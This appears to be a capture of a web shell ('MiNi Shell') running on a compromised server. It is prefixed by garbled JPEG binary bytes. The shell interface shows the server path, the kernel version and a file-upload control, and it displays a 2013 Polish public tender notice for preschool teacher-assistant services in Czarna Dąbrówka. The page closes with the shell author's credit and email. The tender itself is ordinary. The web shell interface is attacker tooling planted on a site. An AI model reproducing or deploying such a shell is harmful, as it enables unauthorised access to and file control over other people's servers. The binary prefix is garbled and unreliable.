JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130814/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130814/328192-N-2013.html

<p class="kh_header"><b>Czarna Dąbrówka: Pełnienie funkcji pomocy nauczyciela do dzieci w wieku przedszkolnym w ramach projektu Przedszkole marzeń w Czarnej Dąbrówce - projekt nr WND POKL.09.01.01-22-80/12; Pełnienie funkcji pomocy nauczyciela do dzieci w wieku przedszkolnym w ramach projektu Przedszkole- pierwszy krok ku dorosłości - projekt nr WND-POKL.09.01.01-22-79/12</b><br>
<b>Numer ogłoszenia: 328192 - 2013; data zamieszczenia: 14.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Czarna Dąbrówka , Czarna Dąbrówka 33, 77-116 Czarna Dąbrówka, woj. pomorskie, tel. 059 8212643, faks 059 8212644.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> czarna-dabrowka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji pomocy nauczyciela do dzieci w wieku przedszkolnym w ramach projektu Przedszkole marzeń w Czarnej Dąbrówce - projekt nr WND POKL.09.01.01-22-80/12; Pełnienie funkcji pomocy nauczyciela do dzieci w wieku przedszkolnym w ramach projektu Przedszkole- pierwszy krok ku dorosłości - projekt nr WND-POKL.09.01.01-22-79/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się:
1. Pełnienie funkcji pomocy do dzieci, której zadaniem będzie: - opieka; wychowanie i realizacja zadań na potrzeby projektu; - odpowiedzialność za zdrowie i bezpieczeństwo dziecka podczas pobytu w placówce oświatowej i poza terenem w czasie wycieczek; spacerów itp.; - utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w ramach projektu; -zapewnienie higienicznych i bezpiecznych warunków dzieci; - oraz inne zadania zlecone bezpośrednio przez Dyrektora szkoły i Nauczyciela prowadzącego zajęcia dla zapewnienia ciągłości i efektywności realizowanych działań w ramach projektu;- pomoc przy prowadzeniu pracy dydaktyczno - wychowawczo - opiekuńczej zgodnie z obowiązującym programem i ponoszenie odpowiedzialności za jej jakość; - wspieranie rozwoju psychofizycznego dziecka; jego zdolności i zainteresowań, 
2. Usługa będzie świadczona w Zespole Szkół w Czarnej Dąbrówce (zadanie nr 1) i Szkole Podstawowej w Jasieniu (zadanie nr 2).
3. Wykonawca zobowiązany jest do ścisłej współpracy z dyrektorami poszczególnych szkół, nauczycielem prowadzącym zajęcia oraz Koordynatorem w zakresie realizacji projektu.
4. Z wykonawcą zostanie zawarta umowa zlecenie na przedmiot zamówienia.
5. Rozliczenie za wykonanie przedmiotu zamówienia następować będzie nie częściej niż raz na miesiąc, na zasadach określonych we wzorze umowy.
6. Zamawiający zastrzega sobie możliwość prowadzenia bieżącej kontroli, nad realizacją zamówienia w okresie obowiązywania umowy.
7. Nad wykonywaną pracą wykonawcy i jej koordynacją, nadzór będą sprawować dyrektorzy  poszczególnych szkół.
8.Zajęcia będą odbywać się codziennie od poniedziałku do piątku w godzinach od 800 do 1300,
 9.Wykonawca natomiast będzie zaczynał pracę o godz. 7:30 (pół godziny przed przyjściem dzieci) i kończył pracę około godz.13:30 tj. do momentu odebrania wszystkich dzieci przez rodziców  lub osoby upoważnione oraz zakończenia zajęć dodatkowych przewidzianych w ilości 232 h (52 h. Mały Odkrywca, 60 h Magic English, 40 h rytmika, 80 h gimnastyka korekcyjna w oddziale Cz. Dąbrówka) oraz 200 h (52 h. Mały Odkrywca, 60 h Magic English, 44 h rytmika, 44 h gimnastyka korekcyjna w oddziale Jasień) - w przypadku gdyby wymagała tego sytuacja.
10. Oprócz zajęć z dziećmi do obowiązków Wykonawcy należy również przygotowanie  sali do zajęć z dziećmi na dzień następny.
11.Wykonawca zobowiązany jest do przekazania Zamawiającemu informacji niezbędnej do prawidłowego wyliczenia kwoty podatku dochodowego i składek z tytułu obowiązkowych ubezpieczeń społecznych i ubezpieczenia zdrowotnego, przed podpisaniem umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania  - na potwierdzenie spełnienia tego warunku wykonawcy przedłożą stosowne oświadczenie, sporządzone wg załącznika nr 2  - ocena metodą warunku graficznego spełnia/niespełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie -posiadają minimum ukończony pierwszy rok studiów o kierunku pedagogicznym - lub dysponują osobami spełniającymi ten warunek - na potwierdzenie tego warunku wykonawcy  załączą dyplom ukończenia studiów w przypadku posiadania wyższego wykształcenia pedagogicznego, w przypadku nieposiadania wykształcenia wyższego pedagogicznego  zaświadczenia z uczelni  o ukończeniu minimum pierwszego roku studiów (może być kserokopia podpisana przez Wykonawcę za zgodność z oryginałem) -  stanowiące integralną część załącznika nr 4. 
W przypadku gdy Wykonawca  ( podmiot) składał będzie ofertę na dwa zadania, to winien dysponować co najmniej 2 osobami z wymaganymi kwalifikacjami  i wykształceniem - na potwierdzenie spełnienia tego warunku wykonawcy przedłożą  wykaz osób - wypełniony  załącznik nr 4 - które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - ocena metodą warunku graficznego spełnia/niespełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują lub będą dysponować odpowiednim potencjałem technicznym do wykonania zamówienia - na potwierdzenie spełnienia tego warunku wykonawcy przedłożą stosowne oświadczenie, sporządzone wg załącznika nr 2  - ocena metodą warunku graficznego spełnia/niespełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się - wymagania określono w punkcie III.3.2 wiedza i doświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełniają wymogi dotyczące sytuacji ekonomicznej i finansowej - na potwierdzenie spełnienia tego warunku wykonawcy przedłożą stosowne oświadczenie, sporządzone wg załącznika nr 2 - ocena metodą warunku graficznego spełnia/niespełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, jeżeli zachodzi taka konieczność.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.czarnadabrowka.pl w zakładce zamówienia publiczne przetargi Urząd Gminy Czarna Dąbrówka<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czarna Dąbrówka ul. Gdańska 5; 77-116 Czarna Dąbrówka..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2013 godzina 09:00, miejsce: Urząd Gminy Czarna Dąbrówka ul. Gdańska 5;77-116 Czarna Dąbrówka pokój nr 12 Sekretariat-przy przesyłce poleconej lub kurierskiej liczy się data i godz. wpływu, a nie data stempla pocztowego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI Prirytet IX rozwój wykształcenie i kompetencji w regionach, działanie 9.1 wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczone w systemie oświaty, Poddziałanie 9.1.1 zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej 1. Pełnienie funkcji nauczyciela do dzieci w wieku przedszkolnym w ramach projektu Przedszkole marzeń w Czarnej Dąbrówce - projekt nr WND-POKL.09.01.01-22-80/12 2. Pełnienie funkcji nauczyciela do dzieci w wieku przedszkolnym w ramach projektu Przedszkole- pierwszy krok ku dorosłości- projekt nr WND-POKL.09.01.01-22-79/12.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji pomocy nauczyciela, do dzieci w wieku przedszkolnym w ramach projektu Przedszkole marzeń w Czarnej Dąbrówce - projekt nr WND-POKL.09.01.01-22-80/12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się:
1. Pełnienie funkcji pomocy do dzieci, której zadaniem będzie: - opieka; wychowanie i realizacja zadań na potrzeby projektu; - odpowiedzialność za zdrowie i bezpieczeństwo dziecka podczas pobytu w placówce oświatowej i poza terenem w czasie wycieczek; spacerów itp.; - utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w ramach projektu; - zapewnienie higienicznych i bezpiecznych warunków dzieci; - oraz inne zadania zlecone bezpośrednio przez dyrektora szkoły i Nauczyciela prowadzącego zajęcia dla zapewnienia ciągłości i efektywności realizowanych działań w ramach projektu;- pomoc przy prowadzeniu pracy dydaktyczno - wychowawczo - opiekuńczej zgodnie z obowiązującym programem i ponoszenie odpowiedzialności za jej jakość; - wspieranie rozwoju psychofizycznego dziecka; jego zdolności i zainteresowań, 
2. Usługa będzie świadczona w Zespole Szkół w Czarnej Dąbrówce.
3. Wykonawca zobowiązany jest do ścisłej współpracy z dyrektorem szkoły, nauczycielem prowadzącym zajęcia oraz Koordynatorem w zakresie realizacji projektu.
4. Z wykonawcą zostanie zawarta umowa zlecenie na przedmiot zamówienia.
5. Rozliczenie za wykonanie przedmiotu zamówienia następować będzie nie częściej niż raz na miesiąc, na zasadach określonych we wzorze umowy.
6. Zamawiający zastrzega sobie możliwość prowadzenia bieżącej kontroli, nad realizacją zamówienia w okresie obowiązywania umowy.
7. Nad wykonywaną pracą wykonawcy i jej koordynacją, nadzór będzie sprawował dyrektor szkoły.
8.Zajęcia będą odbywać się codziennie od poniedziałku do piątku w godzinach od 800 do 1300,
 9.Wykonawca natomiast będzie zaczynał pracę o godz. 7:30 (pół godziny przed przyjściem dzieci) i kończył pracę około godz.13:30 tj. do momentu odebrania wszystkich dzieci przez rodziców  lub osoby upoważnione oraz zakończenia zajęć dodatkowych przewidzianych w ilości 232 h (52 h. Mały Odkrywca, 60 h Magic English, 40 h rytmika, 80 h gimnastyka korekcyjna) - w przypadku gdyby wymagała tego sytuacja.
10. Oprócz zajęć z dziećmi do obowiązków Wykonawcy należy również przygotowanie  sali do zajęć z dziećmi na dzień następny.
11.Wykonawca zobowiązany jest do przekazania Zamawiającemu informacji niezbędnej do prawidłowego wyliczenia kwoty podatku dochodowego i składek z tytułu obowiązkowych ubezpieczeń społecznych i ubezpieczenia zdrowotnego, przed podpisaniem umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji pomocy nauczyciela, do dzieci w wieku przedszkolnym w ramach projektu Przedszkole- pierwszy krok ku dorosłości - projekt nr WND-POKL.09.01.01-22-79/12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się:
1. Pełnienie funkcji pomocy do dzieci, której zadaniem będzie: - opieka; wychowanie i realizacja zadań na potrzeby projektu; - odpowiedzialność za zdrowie i bezpieczeństwo dziecka podczas pobytu w placówce oświatowej i poza terenem w czasie wycieczek; spacerów itp.; - utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w ramach projektu; -zapewnienie higienicznych i bezpiecznych warunków dzieci; - oraz inne zadania zlecone bezpośrednio przez Dyrektora szkoły i Nauczyciela prowadzącego zajęcia dla zapewnienia ciągłości i efektywności realizowanych działań w ramach projektu;- pomoc przy prowadzeniu pracy dydaktyczno - wychowawczo - opiekuńczej zgodnie z obowiązującym programem i ponoszenie odpowiedzialności za jej jakość; - wspieranie rozwoju psychofizycznego dziecka; jego zdolności i zainteresowań, 
2. Usługa będzie świadczona w Szkole Podstawowej w Jasieniu.
3. Wykonawca zobowiązany jest do ścisłej współpracy z dyrektorem szkoły, nauczycielem prowadzącym zajęcia oraz Koordynatorem w zakresie realizacji projektu.
4. Z wykonawcą zostanie zawarta umowa zlecenie na przedmiot zamówienia.
5. Rozliczenie za wykonanie przedmiotu zamówienia następować będzie nie częściej niż raz na miesiąc, na zasadach określonych we wzorze umowy.
6. Zamawiający zastrzega sobie możliwość prowadzenia bieżącej kontroli, nad realizacją zamówienia w okresie obowiązywania umowy.
7. Nad wykonywaną pracą wykonawcy i jej koordynacją, nadzór będą sprawował dyrektor szkoły.
8.Zajęcia będą odbywać się codziennie od poniedziałku do piątku w godzinach od 800 do 1300,
 9.Wykonawca natomiast będzie zaczynał pracę o godz. 7:30 (pół godziny przed przyjściem dzieci) i kończył pracę około godz.13:30 tj. do momentu odebrania wszystkich dzieci przez rodziców  lub osoby upoważnione oraz zakończenia zajęć dodatkowych przewidzianych w ilości  200 h (52 h. Mały Odkrywca, 60 h Magic English, 44 h rytmika, 44 h gimnastyka korekcyjna) - w przypadku gdyby wymagała tego sytuacja.
10. Oprócz zajęć z dziećmi do obowiązków Wykonawcy należy również przygotowanie  sali do zajęć z dziećmi na dzień następny.
11.Wykonawca zobowiązany jest do przekazania Zamawiającemu informacji niezbędnej do prawidłowego wyliczenia kwoty podatku dochodowego i składek z tytułu obowiązkowych ubezpieczeń społecznych i ubezpieczenia zdrowotnego, przed podpisaniem umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com